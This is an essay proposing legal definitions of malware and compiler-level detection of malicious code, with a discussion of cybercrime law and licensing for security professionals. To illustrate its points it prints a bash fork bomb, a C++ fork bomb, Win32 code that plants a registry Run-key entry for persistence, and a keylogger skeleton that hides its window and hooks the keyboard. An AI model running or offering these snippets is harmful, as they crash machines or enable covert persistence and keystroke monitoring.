The Benefits and Challenges of Creating Legal Definitions for Malware

Defense strategies in most organizations generally anticipate that an attacker will make changes to the files on a system, generate activity logs that can be detected by a SIEM (Security Information and Event Management software), or trigger some other file- or log-based vector.

However, fileless malware has been on the rise as an attack vector since 2016. Instead of invading the file systems of target machines with malicious programs that leave behind signatures, better known as indicators of compromise (IOC), attackers have new methods that work exclusively in RAM, forcing security teams to look instead for indicators of attack (IOA).

Looking for IOA turns out to be a big data problem, since most organizations generate far more activity than can be humanly analyzed. In this article, I will look through another lens, one closer to the attacker’s home base, one that would allow law enforcement to make what amounts to a “surgical strike” on coders whose intent falls outside the scope of legitimate programming.

Indications of Maliciousness (IOM) is a new way of looking at compilers and Integrated Development Environments (IDEs), the software that engineers use to create software, to detect when malicious code is being written and to warn the programmer that their code could harm a user’s system or violate the law.

For this approach to succeed as a method of reducing cybercrime, three elements must be developed in close alignment: code-based legal definitions, compiler- and IDE-level IOM detection, and technically sound enforcement. Defining what malicious code looks like will help security tools detect malicious software while it is being written.

Those same definitions might help in creating laws and penalties that serve as a deterrent against malicious behavior before it shows up as malware in any system. If these definitions are appropriately implemented, writing malicious code will be both illegal and impractical.

Now that we have a head start, I will outline the threat posed by fileless malware and review how we are currently responding to it, tactically and legally. Then I will outline a new method of confronting the problem: monitoring IOM at the code level, with legally enforceable definitions, as a collaborative effort with the software engineering community.

As Jessica DeCianno argues in her article for CrowdStrike, we need to start looking for the elements of IOA rather than IOC. This shift in perspective from traditional IOC to IOA is not an easy one for the enterprise or the legal community.

Corporations and governments tend to be slow to respond to these types of changes, mainly because of the tremendous investment involved in developing any solution. Fileless malware has been embraced and celebrated by the hacker community, as evidenced by the number of talks about in-memory exploits at DefCon in 2019.

Every main-stage talk at DefCon involved some sort of in-memory attack. Meanwhile, at BlackHat, a more corporate infosec conference, in-memory attacks were sidelined to smaller, off-the-radar sessions.

The contrast between the conferences is a clear indication that corporate America is not taking in-memory exploits as seriously as it should. Only a handful of security companies, like Cylance, CrowdStrike, and ExtraHop, can boast of full-throated approaches to the analysis of IOA. One reason for this gap is that analyzing IOA is extremely hard, mainly because memory analysis itself is so complex.

As the mainstream slowly shifts to analyzing IOA, more advanced hackers (mostly nation-states) are already moving to methods, such as “living off the land” (LOTL), that make finding IOA almost impossible. Jen Miller-Osborn, deputy director of Threat Intelligence for Unit 42, explains what fileless malware attacks are and why living off the land is so attractive for malicious actors.

“So, these are two ways that attackers now are moving into spaces that are, A, hard to detect, and B, require a lot more behavioral analytics. Because there are a lot of things that you’ll typically see legitimate system admins use, but you’re seeing attackers use. Because instead of using malware or using something such as Mimikatz, which is a known tool, which a lot of people will flag, now they’re using tools where they’re going to be whitelisted.

And they’re probably — if they’re not already present on a network for legitimate purposes, you’ll see, a lot of times, attackers will bring them down because they’re aware that these are legal tools and that they’re probably whitelisted. You aren’t going to detect them maliciously unless you’re running additional behavioral analytics that will show you that these whitelist tools are being used in a way that the sysadmin would not be using them.”

So here we are: most businesses have just started monitoring for IOC, while the latest infosec tools are monitoring for IOA. Ironically, IOA is quickly becoming irrelevant because attackers are learning to hide all of their activity inside whitelisted traffic and tools.

In summary, technology is two steps behind, and to make matters worse, the laws to deal with all this are nearly 34 years old. Before we discuss any effort to monitor IOM, let’s review how the law deals with malware and the people who are caught making it.

The Computer Fraud and Abuse Act (CFAA) has been roundly criticized as being too broad, but that isn’t the only problem with the 34-year-old law. Many have taken issue with the abstract and, frankly, strange definitions included in it. I am not the first to propose a code-based approach to reforming the CFAA.

The code-based approach proposed by Bellia is a call for better definitions based on our current understanding of software instead of the abstract and broad definitions created in 1986. Meanwhile, Kerr points out that much of the CFAA’s confusion lies in the fact that it can’t decide whether infractions are fraud or trespass.

Maybe they are both? Nonetheless, this criticism and debate put a spotlight on the ongoing weaknesses of the law in our current environment. “Hacking” is usually perpetrated by actors who are trespassing and defrauding their victims at the same time.

But maybe the weakness is not that the law’s definitions are too broad, or that the sentencing is out of step, but that the law is focused on the results of cybercrime as opposed to the creation and possession of the tools used to execute the crime.

The Bureau of Alcohol, Tobacco, Firearms, and Explosives regulates the creation, sale, and possession of most deadly weapons. Who is responsible for the regulation of cyberweapons?

The obscure Directorate of Defense Trade Controls (DDTC), part of the Bureau of Political-Military Affairs within the US Department of State, is responsible for enforcing the International Traffic in Arms Regulations (ITAR), but there is no evidence that it has any history of successfully stopping cybercrime.

ITAR is a set of rules maintained by the State Department to restrict and control the export of defense and military-related technologies in order to safeguard US national security and further US foreign policy objectives. However, ITAR hasn’t had much success in the digital space.

Notably, the State Department lost its early attempt to restrict strong encryption. And most recently, it failed even to stop the proliferation of plans for a 3D-printable firearm. In the case of the firearm, the creator of the 3D plans, Cody Wilson, argued that the plans were protected by the First Amendment.

The case was settled with the State Department withdrawing its restriction, which seemed to be a loss for the law enforcement community. Wilson, on the other hand, fought the government in order to prove a point: “You can print a lethal device. It’s kind of scary, but that’s what we’re aiming to show.”

A gun is clearly a lethal device: even though the plans live in the digital space, they can be used to create something in the physical space that may be illegal depending on local laws.

Malicious code may also be harmless when sitting by itself on the private machine of an attacker. It may become destructive, and possibly lethal (imagine code that forces a nuclear reactor to melt down), if it is distributed and unleashed on a target.

However, there is a big difference between what Mr. Wilson published and code that is crafted with the capability to destroy. The code doesn’t need to “become” a physical object before it possesses lethal attributes. As a matter of fact, the code may not even need to be physically on the machine or in the network of a target to be destructive.

Code can be malicious: written and crafted to cause harm to a specific target. Think of it like a poison that affects only one person, based on some sort of DNA-matching biohacking. If the poison has no other purpose (no medical or research value), should it be legal to create?

The world community has generally said no, hence the illegality of substances like sarin gas, which have no redeeming qualities and are designed only to create immense human suffering and death.

If ITAR can’t identify and/or classify “digital poisons” that have no other purpose than to destroy, infiltrate, and compromise the integrity of computer systems and networks, then it has a serious problem. A digital weapon is a weapon nonetheless. If ITAR had a way to technically classify and define malicious intent as it relates to digital weapons, it would be a start.

While the exact cost of cybercrime is largely unknown, one study found, “As a striking example, the botnet behind a third of the spam sent in 2010 earned its owners around $2.7 million, while worldwide expenditures on spam prevention probably exceeded a billion dollars.”

Juxtaposing the money being made and spent on cybercrime against the number of indictments alone, it is very clear that the US legal apparatus has been outnumbered, outgunned, and outsmarted by cybercriminals, with no clear path toward mitigation.

Furthermore, failure to move faster could threaten the integrity of the entire ecosystem. Two years ago, Dan Goodin reported that “a rash of invisible, fileless malware is infecting banks around the globe”: “Virtually all of the malware resides solely in the memory of the compromised computers, a feat that had allowed the infection to remain undetected for six months or more.”

That article, written two years ago, covered a finding from Kaspersky Lab in 2015. Four years is a lifetime in hacker years, so one can only imagine what advancements the attacker side has made since then.

Nonetheless, the response from law enforcement has been stunning silence. I conducted my own research and analyzed a total of 4,049 published state and federal cases that referenced the CFAA (18 USCS § 1030). Only 5% (215) of them led to indictments and criminal proceedings. Think about that for a moment.

Criminal activity is sucking billions of dollars out of the US economy every year, yet the law designed to prosecute the source of that activity has produced only 215 indictments since its inception. Either the law is not being used by prosecutors, or law enforcement can’t find evidence that aligns with it, or both. The right answer is “all of the above.”

I have already addressed the legal issues above in the CFAA and ITAR sections, which mainly have to do with inadequate definitions. But these inadequate definitions spill over to create a serious problem for law enforcement.

In the non-digital world, if I wrote a manifesto and built a bomb, I could be arrested before I deployed said bomb. As a matter of fact, I could even be arrested while I was gathering the bomb materials (18 USC Sec. 842).

What does it mean that writing a manifesto and building a fork bomb (also called a “rabbit virus” or “wabbit”) like the one shown below carries no consequences?

:(){ :|:& };:

Pasting the above code into a terminal on a Linux-based system can bring the machine down (depending on how the code is deployed). The one-liner defines a function that calls itself, pipes the result into another copy of itself, and backgrounds the whole thing, so the number of running processes doubles on every pass until the machine exhausts its memory and process table and stops responding.
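
For readers who don’t parse shell syntax, here is the same logic as a minimal C++ sketch, assuming a POSIX system (do not compile and run this outside a disposable virtual machine):

// WARNING: this is a fork bomb. Running it will make the host
// unresponsive until the processes are killed or it is rebooted.
#include <unistd.h> // fork() on POSIX systems

int main() {
    for (;;) {
        fork(); // every process, parent and child alike, keeps forking,
                // so the process count grows exponentially
    }
}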

We have visual evidence of the harm a physical bomb can cause, but most people don’t know what the one line of code above means. Furthermore, the effects are not as visceral as those of a physical bomb; it kills the machine slowly and silently. The fork bomb does not rip through flesh or topple buildings, but it is dangerous nonetheless.

Who cares if a bomb is detonated in the desert? Nobody. Who cares if a fork bomb is detonated on my home computer that has nothing on it? Nobody (except maybe me, because I just destroyed a computer). But if either of those bombs were detonated in a hospital, say a trauma center where people are counting on the computing infrastructure, it could lead to the loss of lives.

So, in summary, the laws are inadequate, and therefore law enforcement doesn’t have the tools to do its job, and I fear that many law enforcement units have given up. How could it get worse? It is getting worse because the threats are increasing, and the financial damage they cause is intensifying.

The same study about the costs of cybercrime found that most of the threats have been increasing and intensifying. Attackers are not slowing down at all, even though prosecutions under the CFAA and scrutiny under ITAR regulations have increased.

Measurements based on financial damage seem to be the best indicator, because the purveyors of malicious code are generally not interested in killing people or inflicting physical harm.

Most of the attacks have one target: money. Stolen data is sold on the Dark Web, stolen credentials are sold on the Dark Web, and stolen personally identifying information is sold on the Dark Web.

Furthermore, all of this stolen data and information is used to perpetrate fraud, which also has the end goal of stealing money. Jonathan Lusthaus conducted a seven-year study of cybercriminals.

After interviewing 238 of them, he concluded that “they are not who we think they are.” According to Lusthaus, many of them consider themselves “businessmen” rather than stereotypical mischievous nerds.

Furthermore, their interest in cybercrime is usually temporary, meaning they usually hold normal, legitimate jobs and venture into cybercrime to make more money. “More advanced carders and hackers, however, usually show strong disgust to ‘traditional’ criminals and usually join whatever cause there might be on a temporary basis. In turn, ‘traditional’ criminals often regard cybercriminals as ‘milk cows’ and nerds.”

This is an important point because if law enforcement can increase the amount of risk associated with even writing malicious code, it is possible to reduce the number of these “temporary criminals” who will take the risk.

It might seem that creating definitions of cybercrime that include the writing of malicious code would broaden the law, but there is a clear distinction. In the non-digital world, the same action can carry two different meanings, whereas in the digital world a piece of code rarely admits an innocent and a malicious reading at once.

For instance, in the non-digital world, if we made the act of “casing a house” a crime, we would end up criminalizing people who are simply driving by a house over and over, because the act alone looks incriminating. Casing a home acquires its meaning, above and beyond the act of driving by, only in the context of other elements that provide evidence that a person is planning a crime.

In the digital world, there is much less gray area because of the inherent complexity of software. One does not accidentally make a keylogger or create a program that exfiltrates data without user permission. Yes, users can make mistakes and put data in the wrong place, which makes it accessible to unintended parties.

But a software engineer does not accidentally create a system that bypasses user permission unless the operating system has a serious flaw. In the non-digital world, the context and dependencies that support criminal activity are evaluated by a court. In the digital world, this evaluation can be performed by the compiler.

Compilers are sophisticated programs that turn human-readable code into “machine code” that can be understood by a CPU. It is the job of the compiler to read every line of code before turning a program into an executable. Consequently, every compiler has a list of rules, dependencies, and strict requirements that must be satisfied before it will build a program.

To that end, compilers are already gatekeepers for errors that might exist in a program. A program with errors, as defined by the rules of the programming language, won’t compile. This is also what makes building compilers, and tampering with them, extremely difficult: they are immensely complex programs, and some even check for a valid license before they will compile code.
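
As a trivial illustration of that gatekeeping, the fragment below never becomes a runnable program; it violates the type rules of C++, so the compiler refuses to emit a binary:

#include <string>

int main() {
    std::string name = "gatekeeper";
    int n = name; // error: no viable conversion from 'std::string' to 'int'
    return n;     // never reached by a build; compilation halts above
}

An IOM-aware compiler would extend this same mechanism from type errors to dangerous behavioral patterns.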

Making compilers into security gatekeepers will not be easy. However, compilers are the best component in the software development stack for the job. Each instance of a compiler could also carry a signature that verifies the version of the compiler, the subscription granted to the programmer, and the authorization that subscription has to publish software.

The problem is not that compilers are not able to analyze for security violations; it is that they have not been asked to. Of course, if compilers started validating security protocols, attackers would start hacking compilers, but it wouldn’t be easy.

We know that people forge currency, but that doesn’t stop us from creating money with ever more sophisticated ways of catching fakes. The engineering proficiency it would take to create a fake compiler would be enormous, only for the forgery to be discovered and have to be re-invented all over again.

As an extra mitigating step, companies could require that code for any program be delivered uncompiled and only compiled with internally verified compilers. The US Military already does this. I have written code for the US Navy, the US Army, and DISA. They would never use code that I delivered to them pre-compiled. It was always analyzed and compiled by internal resources.

Companies or organizations that control critical infrastructure should do the same. Anything running on a corporate network that has access to sensitive data should be compiled in-house with compilers that are verified for security validation.

Detecting and stopping cybercrime can’t just start when the attacker actually finds a way to breach an organization’s defenses. This is not the case with physical crimes, especially terrorism. We have known since 9/11 that we have a duty to gather intelligence that prevents crime and acts of war.

I would argue that this duty doesn’t change when the crime is perpetrated in the digital space. Furthermore, the main reason we don’t monitor and stop the creation of digital weapons is that we don’t have the tools to do so properly.

Additionally, there is a fear that monitoring the creation of digital weapons would involve spying on engineers or restricting their free speech. While these fears could be legitimate, I feel they underscore the need for a serious discussion about what a collaborative effort between the infosec and legal communities would look like.

We can start by shifting our perspective. Malware doesn’t have an inherent goal of storing files on the hard drive of a machine. The inherent goal of attackers is to steal information and access. Shifting the perspective of defense to match the offense only makes sense.

The programming community needs to start taking responsibility for adding security to compilers and interpreters. Operating system publishers need to work with the hacking community to understand how attackers pivot into memory, and to work with programming language and hardware manufacturers to surface meaningful alerts to users when in-memory activity matches the elements of IOA.

Third-party software like Cylance and CrowdStrike can only do so much. Deep collaboration would create an opportunity for the programming language and the operating system to validate the intent of the user, perhaps with hardware serving as a more immutable test of the authenticity of the communication between the two.

We should consider creating legal definitions of malware that can be enforced at the programming language level for a number of reasons. In the preceding discourse, I have discussed the problems that exist with the current laws and enforcement methods. I also discussed why compilers are well suited for the job of being the low-level enforcers.

But why do we need legal definitions? Can we have gatekeeper compilers without law enforcement? Yes, but creating a gatekeeper is not enough. Legal definitions, when created and implemented carefully, influence behavior beyond the scope of any one group.

The law is our agreement as a nation about what behavior we find acceptable or objectionable. Practically, this means that businesses, organizations, and individuals tend to align their expectations with the law. Without the law, there is no shared expectation of security. Consequently, legal definitions can:

  • Enhance existing detection protocols in anti-virus protection software
  • Create warnings in code-writing IDEs and checks in compilers so that code with dangerous intent will not compile (a sketch of such a check follows this list).
  • Extend the reach of law enforcement to pursue action against people and organizations that host dangerous code
  • Educate software engineers about dangerous code patterns
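
To make the second bullet concrete, here is a deliberately naive sketch of compiler-level IOM detection: a scanner that refuses a source file that installs a global keyboard hook without a matching consent call. The diagnostic code (IOM-0101) and the consent function name (RequestUserConsent) are hypothetical, invented for illustration, and a production implementation would inspect the compiler’s syntax tree rather than raw text:

#include <fstream>
#include <iostream>
#include <sstream>
#include <string>

int main(int argc, char** argv) {
    if (argc < 2) {
        std::cerr << "usage: iom_lint <source.cpp>\n";
        return 1;
    }
    // Read the whole source file into memory.
    std::ifstream in(argv[1]);
    std::stringstream buf;
    buf << in.rdbuf();
    const std::string src = buf.str();

    // Hypothetical rule IOM-0101: a global keyboard hook (a classic
    // keylogging pattern) must be paired with a consent assertion.
    const bool hooks_keyboard = src.find("SetWindowsHookEx") != std::string::npos;
    const bool asks_consent = src.find("RequestUserConsent") != std::string::npos;

    if (hooks_keyboard && !asks_consent) {
        std::cout << argv[1]
                  << ": warning [IOM-0101]: keyboard hook installed "
                     "without a user-consent assertion\n";
        return 2; // an IOM-aware compiler would stop the build here
    }
    std::cout << argv[1] << ": no IOM findings\n";
    return 0;
}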

Regulation of this kind is still relatively new to the world of business software, and businesses have enjoyed its absence. As a result, discussions about regulation have been overpowered by voices protesting that regulation will infringe on First Amendment rights and stifle innovation.

Other skeptics have asserted the well-founded opinion that the regulation of software would have a negative impact on innovation. It is true: new regulation often has a chilling effect on innovation, as it presents an additional roadblock for those developing new and exciting ideas. However, I will challenge these assertions with two important points:

  • Failure to implement controls on software threatens to continue to foster a “wild west” environment where stronger and more unpredictable digital weapons are readily available. These weapons could literally destroy everything we have built in the digital space.
  • Well-defined, programmatic enforcement would not only deter criminals, but may also allow law enforcement to stop digital weapons before they are deployed.

However, there are several challenges with creating malware definitions:

  • It could deter the creation and utilization of legal and legitimate pen-testing software.
  • The definitions could be hard to maintain and may quickly become outdated if they are defined improperly, hastily, too broadly, or too narrowly.

While acknowledging these challenges, we should also recognize that most modern coding languages and compilers were built to rapidly and efficiently handle change management, complex dependencies, and deep self-analysis.

This type of complex definition and decision making is what software does best. Asking engineers to create code that performs pre-forensics on code is no less complex than memory management or cache invalidation. It’s complex and difficult, but it’s not impossible.

After reviewing how broad and intense the threat of malware has become, it might seem paradoxical to learn how simple the goals of attackers can be. In fact, the target of malware is so straightforward that we know almost everything about what malware is trying to do and how it does it. First, malware seeks to evade detection from everyone and everything.

Second, it needs the highest level of permission, root level if possible. Third, malware is trying to steal or expose information that would otherwise be private. The only reason there are so many variations of malware is that they all enter, hide, and steal in different ways.

Much in the same way, a thief who enters a home by picking the lock on the back door needs a different set of tools than the thief who poses as a repairman. In the security research community, there is an agreed-upon classification of malware into nine types:

  • Backdoors: Malicious software that opens a communication channel that cannot be detected by the user or admin.
  • Botnets: Malicious software that silently enrolls a machine in a network of compromised machines that an attacker can command as a group.
  • Downloaders: Malicious software that masquerades as legitimate software but downloads malicious code in the background.
  • Information-stealing malware: Malicious software that exfiltrates sensitive information from the user’s or admin’s system without their knowledge or permission.
  • Launchers: Malicious software that masquerades as legitimate software but runs malicious software in the background without the knowledge or permission of the user or admin.
  • Rootkits: Malicious software that alters the user’s or admin’s operating system, typically to conceal other malicious code and leave the system more vulnerable to attack.
  • Scareware: Malicious software that tries to scare the user or admin into paying a ransom.
  • Spam-sending malware: Malicious software that accesses the user’s or admin’s contact list without their knowledge or permission for the purpose of sending out spam emails.
  • Worm or virus: Malicious software that illicitly sets up persistence on the user’s or admin’s machine with the intent of replicating itself onto any machine the user or admin contacts through a local network or other means.

The classifications have some loose relation to the common behaviors, which include:

Downloaders and Launchers

Backdoors

  • Reverse Shell
  • Remote Access Trojans

Credential Stealers

  • Graphical Identification and Authentication Interception
  • Hash Dumping
  • Keystroke Logging

Persistence

  • Tampering with the Windows Registry (a sketch follows these lists)
  • Trojanized System Binaries
  • DLL Load Order Hijacking

Privilege Escalation

  • Rootkits (Hiding activity)
  • IAT Hooking
  • Inline Hooking
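
To show how concrete these behaviors are in code, here is a minimal sketch of the registry-tampering persistence technique from the list above, using the real Win32 registry API; the value name (“Updater”) and the program path are invented for illustration. An entry under the Run key makes Windows launch the program at every logon:

#include <windows.h>
#include <cstring>

int main() {
    // Open the Run key: programs listed here start at every user logon.
    HKEY key;
    if (RegOpenKeyExA(HKEY_CURRENT_USER,
                      "Software\\Microsoft\\Windows\\CurrentVersion\\Run",
                      0, KEY_SET_VALUE, &key) != ERROR_SUCCESS) {
        return 1;
    }
    // Register an innocuous-sounding value pointing at the malware's path.
    const char* path = "C:\\Users\\Public\\updater.exe"; // illustrative
    RegSetValueExA(key, "Updater", 0, REG_SZ,
                   reinterpret_cast<const BYTE*>(path),
                   static_cast<DWORD>(std::strlen(path) + 1));
    RegCloseKey(key);
    return 0;
}

Nothing in those calls is exotic; legitimate installers use the same API, which is exactly why the missing element, user or admin permission, is what a legal definition should hinge on.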

Researchers and infosec professionals are able to uncover these behaviors because they are evident in the code. For example, keyloggers have a regular pattern: the code “hooks” the internal software that controls the keyboard and attempts to hide its execution from the user or admin by making the window that runs it invisible.
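
Here is a hedged sketch of that pattern using the real Win32 APIs researchers look for (SetWindowsHookEx for the hook, ShowWindow to hide the console window); the actual recording step is reduced to a comment so that the sample documents the shape of the technique rather than providing a working keylogger:

#include <windows.h>

// Called by Windows for every keystroke once the hook is installed.
LRESULT CALLBACK KeyboardProc(int code, WPARAM wparam, LPARAM lparam) {
    if (code == HC_ACTION && wparam == WM_KEYDOWN) {
        KBDLLHOOKSTRUCT* key = reinterpret_cast<KBDLLHOOKSTRUCT*>(lparam);
        (void)key->vkCode; // a real keylogger would record this keystroke
    }
    return CallNextHookEx(NULL, code, wparam, lparam); // stay unnoticed
}

int main() {
    // The hiding step: make the console window that runs the code invisible.
    ShowWindow(GetConsoleWindow(), SW_HIDE);

    // The hook step: intercept every keystroke system-wide.
    HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc,
                                  GetModuleHandle(NULL), 0);
    if (!hook) return 1;

    // Pump messages so the hook keeps receiving keyboard events.
    MSG msg;
    while (GetMessage(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    UnhookWindowsHookEx(hook);
    return 0;
}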

Of course, such code, if implemented this directly, would easily get caught. To avoid detection, attackers hide the activity with techniques like hook injection, overwriting the first instructions of a legitimate function in memory so that execution detours through the attacker’s code before returning to the original.

Hooking into other programs running in memory is a common way to hide, but what if the C++ compiler required a method to verify user permission before it would allow an application to hook the keyboard? Such a notification would obviously give away the stealth desired by an attacker.

What makes this approach even better is the fact that compilers already do this work in other ways. Compilers and interpreters are designed to look for dependencies and warn the programmer or stop compilation altogether if the dependencies are not met. If we are going to allow programmers to write malicious code, we should also require user notification.
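
Here is a hedged sketch of what such a requirement could look like. RequestUserConsent does not exist in any real SDK; it is a hypothetical stand-in for an OS-mediated prompt that an IOM-aware compiler could refuse to build without:

#include <windows.h>
#include <iostream>

// Hypothetical: stands in for an OS-mediated consent prompt. Here it is a
// plain console question; the point is that the check cannot be skipped.
bool RequestUserConsent(const char* action) {
    std::cout << action << " Allow? [y/N] ";
    char answer = 'n';
    std::cin >> answer;
    return answer == 'y' || answer == 'Y';
}

// Pass-through hook procedure, as in the earlier sketch.
LRESULT CALLBACK KeyboardProc(int code, WPARAM wparam, LPARAM lparam) {
    return CallNextHookEx(NULL, code, wparam, lparam);
}

int main() {
    // The compiler-enforced gate: no consent, no hook, and no stealth.
    if (!RequestUserConsent("This program wants to monitor all keystrokes."))
        return 1;

    HHOOK hook = SetWindowsHookEx(WH_KEYBOARD_LL, KeyboardProc,
                                  GetModuleHandle(NULL), 0);
    if (!hook) return 1;

    MSG msg;
    while (GetMessage(&msg, NULL, 0, 0)) {
        TranslateMessage(&msg);
        DispatchMessage(&msg);
    }
    UnhookWindowsHookEx(hook);
    return 0;
}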

Over the years, programmers have argued that regulation of code is a regulation of free speech. We can accept this argument, but we don’t need to accept that this speech is also invisible to the people using the program. A compiler in any language knows when methods are being used in violation of that language’s standards.

Here are some examples of code that should be illegal to write and deploy. Code that:

  • Modifies the core functions of the operating system without ongoing user or admin permission.
  • Modifies the Windows Registry without user or admin permission.
  • Implements a hook associated with keylogging without user or admin permission.
  • Implements a hook associated with command and control without user or admin permission.
  • Implements a hook in a way that hides which program is running, without user or admin permission.

The common thread here is a major action being taken “without user or admin permission”. What can be considered a major action? Here is a starter list:

  • Any action that exposes the user’s or admin’s personally-identifying information.
  • Any action that monitors, records, or tracks the user’s or admin’s activity globally.

There are many reasons why some programmers should be allowed to create malicious code. Penetration testers, sometimes referred to as the Red Team, use malicious code to test the strength of an organization’s defenses.

Intelligence agencies use many of the same tools to penetrate criminal organizations or gather international signals intelligence. In both of these cases, the programmer is acting in the capacity of a security professional and doing their job.

Their goal is not to operate outside the bounds of the law, but to simulate an attack from a malicious actor with the permission of an organization, or to use malicious code in the context of law enforcement the same way a police officer would use a gun. One could argue that the same is true of those seeking security education, although the use of and exposure to such code should be controlled.

Explaining what a fork bomb is to a room of students and giving the details on how to deploy one covertly by hijacking administrator privileges in Microsoft Active Directory are two very different things. The first is educational information, and the second is instructions.

Law enforcement, penetration testing, military operations, limited educational applications: all of these are valid exceptions for handling dangerous code, but only in the same way we make exceptions for people handling other dangerous weapons. I can’t just walk into the grocery store and buy an Uzi.

As a matter of fact, I can’t walk into a store and buy any type of firearm in the state of California without a license and a background check. Digital weapons should be handled with the same amount of care. The reason they haven’t been is that digital weapons are not physical, yet they can cause great physical damage.

Engineers who handle dangerous code for professional, research, or educational purposes should register with a licensing body in the same way law enforcement or military personnel must register to possess deadly weapons. Law enforcement licenses for digital weapons would be handled by the Department of Justice.

Military authorization to use digital weapons would be handled by the Pentagon. Pentesting and educational licenses should be issued by an agency like CISA (Cybersecurity and Infrastructure Security Agency). Each piece of pen-testing or educational code should include the operator’s digital signature in the form of a public key.
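
What might that signature look like in practice? One hedged possibility, with every field name invented for illustration, is an attestation block that the compiler embeds in the binary and that scanners or investigators can verify against the licensing body’s registry:

// iom-attestation (hypothetical format; every field is illustrative)
// operator:  licensed penetration tester, CISA license number
// pubkey:    the operator's public key, registered with CISA
// scope:     the authorized engagement and its date range
// signature: a detached signature over the compiled artifact, made with
//            the operator's private key, so the binary is traceable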

This kind of open discussion about the exceptions to the regulation of digital weapons is really a discussion about how to create a structure or structures that regulate and allow the use of such code for the correct purposes. Doubtless, digital weapons will continue to be created; there is no question about that.

The question is whether the creation and use of such code should be regulated by requiring the people who make and use it to identify themselves. Creating or possessing a digital weapon is not free speech, in the same way that building or buying a gun is not free speech.

Americans have yet to embrace this concept, but non-physical things can be dangerous, maybe even more dangerous than physical things. Some may say this is a slippery slope: the next thing you know, we will start regulating the discussion of certain topics or the thinking of certain ideas.

But there is a huge difference between a discussion about how to attack a computer system and the compiled code that targets that system. A discussion will never cause harm to a system until someone takes the details from that discussion and writes code to carry out an attack.

If thoughts and expressions of violence were the equivalent of actual violence, there wouldn’t be any films, books, or television. I understand the sentiment; digital weapons are code, and code is a language that feels very close to written expression, like this article, for example. But code is much more than the expression of an idea.

Code is a set of instructions designed to carry out actions in the digital space. If those instructions are designed to destroy, damage, or steal, then those instructions are a digital weapon.

In summary, we have established a few things. First, digital weapons are doing a lot of damage to our country and the world at large. Second, the laws we have to stop this activity are not being used and need to be refined so that they cover the tools used to conduct criminal activity, not just the activity itself.

Third, we have the ability to create specific technical definitions of what maliciousness is in the digital space and to train compilers and IDEs to spot it. Lastly, we can create a regulatory structure that makes room for approved uses of malicious code: penetration testing, military or law enforcement operations, and limited educational purposes.

I have a feeling that security professionals won’t be too happy about having to register with the government as cybersecurity professionals, but the benefits tremendously outweigh the hassle. The IDE and the compiler will warn you if your code looks malicious.

But if you are writing malicious code for the “right reasons” I outlined above, just register with CISA, upload your public key, and the warnings will go away. It’s fun to pretend to be the bad guy, but as a security professional, I also need to advocate for doing what is right.

Software as an industry has resisted regulation for decades, but we are far beyond the days when two guys fiddling with phones and motherboards in their garage could be considered non-threatening. Our lives are supported by a delicate yet incredibly powerful digital infrastructure. It is high time we create the frameworks, backed by the power of a robust legal system, that will protect it.
